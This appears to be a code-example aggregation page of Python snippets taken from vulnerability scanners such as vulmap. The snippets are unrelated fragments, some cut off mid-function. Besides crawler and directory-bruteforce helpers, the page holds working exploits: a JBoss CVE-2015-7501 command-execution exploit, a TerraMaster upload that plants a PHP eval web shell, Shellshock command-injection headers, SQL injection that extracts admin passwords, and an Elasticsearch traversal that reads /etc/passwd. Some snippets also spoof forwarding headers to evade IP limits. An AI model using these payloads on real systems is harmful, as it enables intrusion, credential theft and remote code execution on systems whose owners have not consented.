         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Esempio n. 22
0
    def _matchRequests(self, fp):
        if not self._cmsEnhance:
            return ['requests', None, None]
        matchs = []
        for line in fp:
            uri = self._metaInfo['target'].baseURL.rstrip("/") + line
            try:
                self._log.debug("matchRequests get {0}".format(uri))
                response = http.get(uri, allow_redirects=False)
            except http.ConnectionError:
                continue
            else:
                if response.status_code == 200:
                    if self._notFoundPattern:
                        if self._notFoundPattern in response.content:
                            continue
                        else:
                            self._log.debug("matchRequests got >>> {0}".format(uri))
                            matchs.append(uri)
                    else:
                        self._log.debug("matchRequests got >>> {0}".format(uri))
                        matchs.append(uri)
                else:
                    continue

        if len(matchs) == len(fp):
            return ['requests', str(matchs), None]
        else:
            return ['requests', None, None]
Esempio n. 23
0
    def cve_2015_7501_exp(self, cmd):
        vul_name = "RedHat JBoss: CVE-2015-7501"
        self.path = "/invoker/JMXInvokerServlet"
        self.headers = {
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            'User-Agent': self.ua,
            "Connection": "close"
        }
        try:
            self.req = requests.post(self.url + self.path,
                                     data=self.payload_cve_2015_7501,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
            time.sleep(0.5)
            self.cmd = urlencode({"ppp": cmd})
            self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" +
                                        self.cmd,
                                        headers=self.headers,
                                        timeout=self.timeout,
                                        verify=False)

            r = self.url + "/jexinv4/jexinv4.jsp?" + self.cmd
            r += "\n"
            r += self.request.text
            self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
            verify.exploit_print(r, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)
Esempio n. 24
0
def version_check():
    n = random.choice(range(10))
    if n <= 1:
        version = globals.get_value("VULMAP")  # 获取全局变量VULMAP版本号
        timeout = globals.get_value("TIMEOUT")  # 获取全局变量TIMEOUT
        headers = globals.get_value("HEADERS")  # 获取全局变量HEADERS
        github_ver_url = "https://github.com/zhzyker/vulmap/blob/main/version"
        now_warn = now.timed(de=0) + color.red_warn()
        try:
            github_ver_request = requests.get(url=github_ver_url,
                                              headers=headers,
                                              timeout=timeout)
            version_res = r'blob-code blob-code-inner js-file-line">(.*)</td>'
            github_ver = re.findall(version_res, github_ver_request.text,
                                    re.S | re.M)[0]
            if version == github_ver:
                print(
                    now.timed(de=0) + color.yel_info() +
                    color.yellow(" Currently the latest version: " + version))
            elif version < github_ver:
                print(now_warn +
                      color.red(" The current version is: " + version +
                                ", Latest version: " + github_ver))
                print(now_warn + color.red(
                    " Go to github https://github.com/zhzyker/vulmap update"))
            else:
                print(now_warn +
                      color.red(" Internal beta version: " + version))
        except requests.exceptions.ConnectionError:
            print(now_warn + color.red(" The current version is: " + version +
                                       ", Version check failed"))
        except requests.exceptions.Timeout:
            print(now_warn + color.red(" The current version is: " + version +
                                       ", Version check failed"))
Esempio n. 25
0
 def getshell(self, url):
     '''
     TerraMaster 文件上传GetShell函数
     :param url:  TerraMaster url地址
     :return:     返回得到的shell地址
     '''
     exp_url = url + 'include/upload.php?targetDir=../cgi-bin/filemanage/'
     headers = {
         'User-Agent':
         'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
     }
     filename = 'safe.php'
     with open(filename, 'wb') as fp:
         fp.write('<?php @eval($_POST[mosin]);?>')
     files = {
         'Filename': (None, filename),
         'name': (None, filename),
         'chunk': (None, '0'),
         'chunks': (None, '1'),
         'file': (filename, open(filename,
                                 'rb'), 'application/octet-stream'),
         'Upload': (None, '给老子上!')
     }
     try:
         requests.post(exp_url, files=files, headers=headers)
         shell = url + 'cgi-bin/filemanage/' + filename
         reqcode = requests.get(shell, headers=headers).status_code
     except Exception, msg:
         print '\n[x] ERROR!!!:', msg
Esempio n. 26
0
def crawl(url, currentDepth, countUrls):

    redisCon = Redis(host=conf.REDIS_HOST,
                      port=conf.REDIS_PORT,
                      password=conf.REDIS_PASSWD)

    try:
        headers = dict()
        headers[HTTP_HEADER.USER_AGENT] = randomUserAgents()

        response = requests.get(url, timeout=10, headers=headers)
        # crawlMsg = 'crawled %s depth: %d count: %d' % (url, currentDepth, countVisitedUrls)
        # logger.log(CUSTOM_LOGGING.SYSINFO, crawlMsg)
        content = response.text

        kb.pageEncoding = response.encoding
        conf.cookie = str(response.cookies.get_dict())
        hashData = hashUrl(url)
        redisCon.sadd('visited', hashData)
        redisCon.lpush('visitedList', url)
        getDB().insert({'url':url, 'depth': currentDepth, 'count':countUrls})

    except Exception, ex:
        logger.log(CUSTOM_LOGGING.ERROR, ex)
        # print traceback.print_exc()
        return
Esempio n. 27
0
 def dnslog_cn():
     headers_dnslog = {
         'User-Agent':
         'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
         'Host': 'www.dnslog.cn',
         'Cookie':
         'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
         'Accept': '*/*',
         'Referer': 'http://www.dnslog.cn/',
         'Accept-Language': 'zh-CN,zh;q=0.9',
         'Connection': 'close'
     }
     dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
     d_p = globals.get_value("DNS_DNSLOG_HOST")
     try:
         if d_p is None:
             dns = requests.get(dnslog_api,
                                headers=headers_dnslog,
                                timeout=timeout,
                                verify=False)
             dns_host = random_md5() + "." + dns.text
             globals.set_value("DNS_DNSLOG_HOST", dns.text)
             return dns_host
         else:
             dns_host = random_md5() + "." + globals.get_value(
                 "DNS_DNSLOG_HOST")
             return dns_host
     except Exception:
         return "error"
Esempio n. 28
0
    def _search(self, params):
        '''
        Request with specified param, parse the response html document.
        @params:
            params: the query params
        @returns:
            return the search result, result format is:
                [[titel,url,brief-information],[...]...]
        '''
        for i in xrange(self.retry):
            #use delay time and random user-agent to bypass IP restrict policy
            delayTime = random.randint(1,3)
            time.sleep(delayTime)

            userAgent = self.userAgents[random.randint(0,len(self.userAgents))-1]
            xforward = "192.168.3." + str(random.randint(1,255))

            headers = {"User-Agent":userAgent, "X-Forward-For":xforward, "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3"}
            try:
                response = http.get(self.url, headers=headers, params=params)
            except http.RequestException as error:
                continue
            
            # 如果findSignature没有找到,则可能说明触发了搜索引擎的IP限制策略,此时retry;如果找到则无需retry
            if self.findSignature in response.text:
                for item in self._parseHtml(response.text):
                    yield item
                break
            elif self.notFindSignature in response.text:
                raise StopIteration()
        else:
            raise StopIteration()
Esempio n. 29
0
    def _checkPath(self, path, pattern):
        url = self.baseURL + path
        try:
            #response = http.get(url)
            response = http.get(url, allow_redirects=False)
        except http.ConnectionError as error:
            self.log.debug("Checking '{0}' failed, connection failed".format(url))
            return False

        if response.status_code == 200:
            if self.notFoundPattern:
                if self.notFoundPattern in response.content:
                    self.log.debug("Checking '{0}' failed, notFoundPattern matchs.".format(url))
                    return False
                #if response.history:
                #    if self.notFoundPattern in response.history[0].content:
                #        self.log.debug("Checking '{0}' failed, notFoundPattern matchs.".format(url))
                #        return False
            if not pattern:
                self.log.debug("Checking '{0}' success, status code 200.".format(url))
                return True
            else:
                if pattern in response.text:
                    self.log.debug("Checking '{0}' success, status code 200, match pattern {1}.".format(url,pattern))
                    return True
                else:
                    self.log.debug("Checking '{0}' failed, pattern not found.".format(url))
                    return False
        else:
            self.log.debug("Checking '{0}' failed, status code {1}".format(url, response.status_code))
            return False
Esempio n. 30
0
 def _response_for(self, path):
     uri = "/".join([self._base_uri, path])
     response = requests.get(uri, headers=self._headers)
     if response.status_code == 200:
         body = self._handle_success(response, uri)
         return body
     else:
         self._handle_error(response, uri)
Esempio n. 31
0
 def _http_conn(url):
     try:
         timeout = globals.get_value("TIMEOUT")  # 获取全局变量TIMEOUT
         headers = globals.get_value("HEADERS")
         target = url_check(url)
         requests.get(target,
                      timeout=timeout,
                      headers=headers,
                      verify=False)
         return "s"
     except requests.exceptions.ConnectionError:
         return "f"
     except requests.exceptions.Timeout:
         return "f"
     # add by https://github.com/zhzyker/vulmap/issues/30 @zilong3033 fix url extract
     except requests.exceptions.InvalidURL:
         return "f"
Esempio n. 32
0
 def _response_for(self, path):
     uri = "/".join([self._base_uri, path])
     response = requests.get(uri, headers=self._headers)
     if response.status_code == 200:
         body = self._handle_success(response, uri)
         return body
     else:
         self._handle_error(response, uri)
    def verify(self):
        re_pattern = re.compile(r'~~~(.*?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_headers = {'user-agent': r'''() { :; }; echo; echo ~~~`id`~~~'''}

        try:
            response = requests.get(self.option.url, headers=exp_headers, verify=False)
        except Exception, e:
            self.result.error = str(e)
            return
Esempio n. 34
0
 def get_page_size(self, url):
     try:
         req = requests.get(url, timeout=self.timeout)
         # 有时候没有content-length这个键
         page_size = int(req.headers["content-length"]) if "content-length" in req.headers else len(req.content)
         return page_size
     except Exception, e:
         log.output_log("[error] " + str(e), True)
         return 0
Esempio n. 35
0
 def confirm_sucess(self):
     req = requests.get(self.API_URL)
     d = req.json()
     try:
         name = d['data'][0]['name']
         if self.BANNER in name:
             return True
     except Exception:
         return False
Esempio n. 36
0
 def sendRequest(self, cookies="", agent=""):
     cookies = cookies
     User_Agent = agent if agent is not "" else "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
     header = {"User-Agent": User_Agent, "Cookie": cookies}
     for url in self.UrlList:
         res = requests.get(url, headers=header)
         if res.status_code != 404:
             self.table.append(url)
     return str(self.table)
Esempio n. 37
0
 def get_page_size(self, url):
     try:
         req = requests.get(url, timeout=self.timeout)
         # 有时候没有content-length这个键
         page_size = int(req.headers["content-length"]) if "content-length" in req.headers else len(req.content)
         return page_size
     except Exception, e:
         log.output_log("".join(["[error] ", str(e)]), True)
         return 0
Esempio n. 38
0
 def confirm_sucess(self):
     req = requests.get(self.API_URL)
     d = req.json()
     try:
         name = d['data'][0]['name']
         if self.BANNER in name:
             return True
     except Exception:
         return False
Esempio n. 39
0
 def get_server_info(self, url):
     server_info = {}
     try:
         req = requests.get(url, timeout=self.timeout)
         status_code, server_type, web_type = req.status_code, req.headers['server'], req.headers["x-powered-by"]
         server_info.setdefault("status_code", status_code)
         server_info.setdefault("server", server_type)
         server_info.setdefault("x-powered-by", web_type)
     except Exception, e:
         print str(e)
    def exploit(self):
        re_pattern = re.compile(r'~~~(.*?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_headers = {
            'user-agent': '() {{ :; }}; echo; echo ~~~`{command}`~~~'.format(command=self.option.cmd)
        }

        try:
            response = requests.get(self.option.url, headers=exp_headers, verify=False)
        except Exception, e:
            self.result.error = str(e)
            return
Esempio n. 41
0
    def _initMetaInfo(self):
        self._metaInfo['url'] = self._url
        self._metaInfo['target'] = self._target
        try:
            response = http.get(self._target.uri)
        except http.ConnectionError:
            raise PenError("Can not connect to {0}".format(self._target.uri))
        else:
            self._metaInfo['statusCode'] = response.status_code
            self._metaInfo['headers'] = response.headers
            self._metaInfo['html'] = response.content
            self._metaInfo['title'] = self._getTitle(response.content)

        self._metaInfo['robots'] = ""
        try:
            response = http.get(self._target.baseURL+"robots.txt")
        except http.ConnectionError:
            pass
        else:
            if response.status_code == 200:
                self._metaInfo['robots'] = response.content
    def verify(self):
        self.print_debug("verify start")

        re_version_pattern = re.compile(r'~~~(.+?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        cookies = {'cookie': 'admin'}
        exp_url = ("{domain}/php/bill/list_userinfo.php?domain=fatezero.org&ok=1&cp=1 union "
                   "select concat(0x7e7e7e,@@version,0x7e7e7e),2,3,4,5%23".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False)
        except Exception, e:
            self.result.error = str(e)
            return
    def exploit(self):
        self.print_debug("exploit start")

        re_userinfo_pattern = re.compile(r'~~~(\w+?)\|\|\|(\w+?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        cookies = {'cookie': 'admin'}
        exp_url = ("{domain}/php/bill/list_userinfo.php?domain=fatezero.org&ok=1&cp=1 union select concat(0x7e7e7e,"
                   "oid,0x7c7c7c,password,0x7e7e7e),2,3,4,5 from admininfo%23".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False)
        except Exception, e:
            self.result.error = str(e)
            return
Esempio n. 44
0
def http_request_get(url, body_content_workflow=0,stream=False):
    trycnt = 0

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36',
        'Referer': url,
        'X-CSRF-Token': 'gq+Gnl4JMKKOhALUqNUwZmVBQvEPr7GwB83R26v4SRo=',
        'Cookie': 'Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1445508519,1447835208; bdshare_firstime=1406012352921; __cfduid=d332bae9f4e8436979014dc2898aadb521427525951; PHPSESSID=grsutmbkjv942rgdvot3j8jd25; wy_uid=4a16IUdtWwwtFHCYfHaWUq1GsXLBZ7Nt7obf4Ww6q4Ry; wy_pwd=d437Bj2YxrEN8YXL7zLZ3%2FAwIHu00E1CdXktJy6K4421FwRmhRX%2BFVpqBDmgZ7jPV7RvIfZfodBrSEdYBA; wy_token=3dd1db3721a539c70e82f84e24407515; Hm_lpvt_c12f88b5c1cd041a732dea597a5ec94c=1447835243'}
    while True:
        try:
            if body_content_workflow == 1:
                result = requests.get(url, stream=True, headers=headers, timeout=timeout, proxies=proxies, verify=False)
                return result
            else:
                result = requests.get(url, headers=headers, timeout=timeout, proxies=proxies, verify=False)
                return result
        except Exception, e:
            # print 'Exception: %s' % e
            trycnt += 1
            if trycnt >= retry_cnt:
                # print 'retry overflow'
                return False
Esempio n. 45
0
    def check_site_dir(self, site_root):
        while True:
            test_dir = self.get_payload()
            if test_dir is None:
                break
            test_url = site_root + test_dir
            try:
                req = requests.get(test_url, headers=self.headers, cookies=None, timeout=3)
                status_code = req.status_code
                status = self.status_codes[str(status_code)][0] \
                    if str(status_code) in self.status_codes else "Undefined"
                self.result_dispose("[site_dir][%d][%s]%s" % (status_code, str(status), test_url))

            except Exception, e:
                log.output_log("[error] " + str(e), True)
                pass
Esempio n. 46
0
    def get_page_source(self, url, headers, cookies, times=0):
        if times < 3:
            try:
                req = requests.get(url, headers=headers, cookies=cookies, timeout=self.timeout)
                if req.status_code == 200:
                    html = req.text
                    req.close()
                    return html

                if req.status_code == 403:
                    times += 1
                    log.output_log("[error] 403 and try to connet %d" % times, True)
                    proxy_switch.link_proxy(self.proxy)
                    self.get_page_source_info(url, headers, cookies, times)
                return None

            except Exception, e:
                log.output_log("".join(["[error] ", str(e)]), True)
                return None
Esempio n. 47
0
    def request(self, path):
        i = 0
        proxy = None
        result = None
        while i <= self.maxRetries:
            try:
                if self.proxy is not None:
                    proxy = {"https" : self.proxy, "http" : self.proxy}
                url = "{0}://{1}:{2}".format(self.protocol, self.host, self.port)
                url = urllib.parse.urljoin(url, self.basePath)

                # Joining with concatenation because a urljoin bug with "::"
                if not url.endswith('/'):
                    url += "/"
                if path.startswith('/'):
                    path = path[1:]
                    #print(path)
                url += path

                headers = dict(self.headers)
                if self.randomAgents is not None:
                    headers["User-agent"] = random.choice(self.randomAgents)
                #print(url)
                response = requests.get(url, proxies=proxy, verify=False, allow_redirects=self.redirect, \
                                        headers=headers, timeout=self.timeout)
                result = Response(response.status_code, response.reason, response.headers, response.content)
                del headers
                break
            except requests.exceptions.ConnectionError as e:
                if self.proxy is not None:
                    raise RequestException({'message': 'Error with the proxy: {0}'.format(e)})
                continue
            except (requests.exceptions.ReadTimeout, requests.exceptions.Timeout, http.client.IncompleteRead, \
                    socket.timeout):
                continue
            finally:
                i = i + 1
        if i > self.maxRetries:
            raise RequestException(\
                {'message': 'CONNECTION TIMEOUT: There was a problem in the request to: {0}'.format(path)}
                )
        return result
 def verify(self):
     try:
         host = self.option.url
         PluginList = ['head','test','kopf', 'HQ', 'marvel', 'bigdesk']
         port = 9200
         fpath = '/etc/passwd'
         re_result_info=''
         try:
             for plugin in PluginList:
                 exp_url = ("{domain}:9200/_plugin/{plugin}/../../../../../../../../..{fpath}".format(domain=self.option.url,plugin=plugin,fpath=fpath))
                 response = requests.get(exp_url,timeout=15, verify=False)
                 if(-1!=response.content.find("root")):
                     self.option.cmd = "root"
                     self.result.status = True
                     self.result.status = True
                     self.result.data.cmd_info.cmd = '/etc/passwd'
                     break
         except Exception,e:
                 print "[-] Error connecting to %s:%s" % (host,e)
                 sys.exit()
     except Exception, e:
         self.result.error = str(e)
         return
Esempio n. 49
0
    def bruteforce(self, baseURL, notFoundPattern=None, safeURL=None, timeout=10, delay=0):
        '''
        爆破
        '''
        baseURL = URL.getURI(baseURL)

        keyword = self._getKeywordFromURL(baseURL)
        if keyword:
            self.keywords.append(keyword)

        matchs = []
        baseURL = baseURL.rstrip("/")
        for line in self._dictIter():
            time.sleep(delay)
            self._safeRequest(safeURL)

            url = baseURL.rstrip("/") + line
            try:
                self.log.debug(u"request url '{0}'".format(url))
                #response = http.get(url, timeout=timeout)
                response = http.get(url, timeout=timeout, allow_redirects=False)
            except http.ConnectionError:
                continue
            if response.status_code == 200:
                if notFoundPattern:
                    if notFoundPattern in response.content:
                        continue
                    #if response.history:
                    #    if notFoundPattern in response.history[0].content:
                    #        continue
                else:
                    self.log.debug(u"find available url '{0}'".format(url))
                    matchs.append(url)
            else:
                continue

        return matchs